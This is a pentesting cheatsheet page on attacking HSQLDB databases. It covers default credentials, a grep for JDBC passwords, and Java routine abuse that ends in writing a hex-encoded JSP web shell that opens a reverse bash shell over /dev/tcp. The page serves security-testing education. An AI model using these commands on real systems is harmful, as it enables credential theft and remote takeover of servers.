daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

9001-pentesting-hsqldb.md (4251B)


      1 ---
      2 title: "9001 - Pentesting HSQLDB"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/9001-pentesting-hsqldb.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/9001-pentesting-hsqldb.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # 9001 - Pentesting HSQLDB
     14 
     15 ## Basic Information
     16 
     17 **HSQLDB (HyperSQL DataBase)** is a Java relational database supporting in-memory, disk-based, embedded, and server modes.<sup>[[1]](#references)</sup>
     18 
     19 **Default port:** 9001
     20 
     21 ```text
     22 9001/tcp open  jdbc      HSQLDB JDBC (Network Compatibility Version 2.3.4.0)
     23 ```
     24 
     25 ## Default Settings
     26 
     27 Note that by default this service is likely running in memory or is bound to localhost. If you found it, you probably exploited another service and are looking to escalate privileges.
     28 
     29 Fresh databases historically create the initial administrator as `SA` with an empty password, but packaged applications commonly change it. Treat `sa`/blank as a configuration check, not a guaranteed network default.<sup>[[4]](#references)</sup>
     30 
     31 If you’ve exploited another service, search for possible credentials using
     32 
     33 ```text
     34 grep -rP 'jdbc:hsqldb.*password.*' /path/to/search
     35 ```
     36 
     37 Note the database name carefully - you’ll need it to connect.
     38 
     39 ## Info Gathering
     40 
     41 Download HSQLDB, extract `hsqldb/lib/hsqldb.jar`, and run its GUI manager with `java -jar hsqldb.jar`; then connect using the discovered credentials.<sup>[[2]](#references)</sup>
     42 
     43 Note the connection URL will look something like this for a remote system: `jdbc:hsqldb:hsql://ip/DBNAME`.
     44 
     45 ## Tricks
     46 
     47 ### Java Language Routines
     48 
     49 HSQLDB Java Language Routines can call eligible static methods from classes visible to the database engine's class loader. Routine privileges and the `hsqldb.method_class_names` allowlist can restrict which methods are callable.<sup>[[5]](#references)</sup>
     50 
     51 JRTs can be `functions` or `procedures`. Functions can be called via SQL statements if the Java method returns one or more SQL-compatible primitive variables. They are invoked using the `VALUES` statement.
     52 
     53 If the Java method we want to call returns void, we need to use a procedure invoked with the `CALL` statement.
     54 
     55 ### Reading Java System Properties
     56 
     57 Create function:
     58 
     59 ```text
     60 CREATE FUNCTION getsystemproperty(IN key VARCHAR) RETURNS VARCHAR LANGUAGE JAVA
     61 DETERMINISTIC NO SQL
     62 EXTERNAL NAME 'CLASSPATH:java.lang.System.getProperty'
     63 ```
     64 
     65 Execute function:
     66 
     67 ```text
     68 VALUES(getsystemproperty('user.name'))
     69 ```
     70 
     71 Oracle documents the standard system-property names.<sup>[[3]](#references)</sup>
     72 
     73 ### Write Content to File
     74 
     75 On compatible older JDKs where the internal class is visible and allowed, `com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename` can write hex-decoded bytes through a custom procedure. This is JDK- and module-policy-dependent and may fail on modern runtimes. The **1024-byte limit below comes from the declared `VARBINARY(1024)` parameter** and can be adjusted; it is not an inherent gadget limit.<sup>[[5]](#references)</sup>
     76 
     77 Create procedure:
     78 
     79 ```text
     80 CREATE PROCEDURE writetofile(IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(1024))
     81 LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME
     82 'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'
     83 ```
     84 
     85 Execute procedure:
     86 
     87 ```text
     88 call writetofile('/path/ROOT/shell.jsp', cast ('3c2540207061676520696d706f72743d226a6176612e696f2e2a2220253e0a3c250a202020537472696e6720636d64203d20222f62696e2f62617368202d69203e26202f6465762f7463702f3139322e3136382e3131392[...]' AS VARBINARY(1024)))
     89 ```
     90 
     91 ## References
     92 
     93 - [1] [HSQLDB - HyperSQL DataBase (official site)](http://hsqldb.org/)
     94 - [2] [HSQLDB downloads (SourceForge)](https://sourceforge.net/projects/hsqldb/files/)
     95 - [3] [The Java Tutorials - System Properties](https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html)
     96 - [4] [HSQLDB Guide - Management and users](https://hsqldb.org/doc/2.0/guide/management-chapt.html)
     97 - [5] [HSQLDB Guide - SQL-invoked routines](https://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html)